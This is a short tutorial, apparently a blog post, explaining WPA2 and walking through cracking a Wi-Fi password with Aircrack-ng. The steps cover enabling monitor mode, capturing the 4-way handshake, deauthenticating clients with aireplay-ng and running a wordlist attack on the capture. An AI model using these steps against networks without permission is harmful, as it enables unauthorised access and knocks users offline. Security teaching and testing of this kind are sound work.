Cracking Wi-Fi Passwords using Aircrack-ng!

By: George Bousygine

March 08, 2021


Background

What is Wi-Fi?

  • Wireless networking technology to interface with the internet
  • Stands for Wireless Fidelity
  • Uses radio frequencies to send signal between devices
  • Frequency is 2.4Ghz and 5Ghz learn more

What is Aircrack-ng?

Official Website

  • A complete suite of tools to assess Wi-Fi network security.

It focuses on different areas of Wi-Fi security:

  • Monitoring: Packet capture and export of data to text files for further processing by third party tools.
  • Attacking: Replay attacks, deauthentication, fake access points and others via packet injection.
  • Testing: Checking WiFi cards and driver capabilities (capture and injection).
  • Cracking: WEP and WPA PSK (WPA 1 and 2).

    Wi-Fi securities:

    WEP, WPA, WPA2, WPA3, WPS Leran more

WPA2

  • Stronger security than WPA using a stronger encryption method
  • AES (advanced encryption standart) - which makes it strong enough to resist brute force attack unlike WPA
  • Uses 4 way handshake process to join the network

4 Way Handshake

Diagram

Demonstration

Before we begin, the computer must have a network adapter that supports monitor mode.

Find out what chipset & driver you need: click here

  1. Check what mode wlan0 is in:
    $ iwconfig
    

    This should be in “Managed mode”

  2. Kill all other processes: (we don’t want anything to interfere with what we are doing)
    $ sudo airmon-ng check kill
    
  3. Change monde into monitor mode:
$ sudo airmon-ng start wlan0

Check again what mode we are in using the first command

  1. Find out AP’s MAC address and channel:
    $ sudo airodump-ng wlan0
    

    Note - Only do this on your own netwrok or with permission on other ones!!!

  2. Open another terminal to capture the 4-way handshake:
    $ sudo airodump-ng -w ["name of file"] -c ["Channel Number"] --bssid ["MAC Address"] wlan0
    
  3. In first terminal we will deauthenticate client from network:
$ sudo aireplay-ng --deauth 0 -a ["MAC Address"] wlan0

Waiting for client to reconnect step 5 will capture the 4-way handshake

  1. Crack the file:
    $ sudo  aircrack-ng [".cap File"] -w ["Word List"] 
    

    To stop monitor mode run the following command:

    $ sudo airmon-ng stop wlan0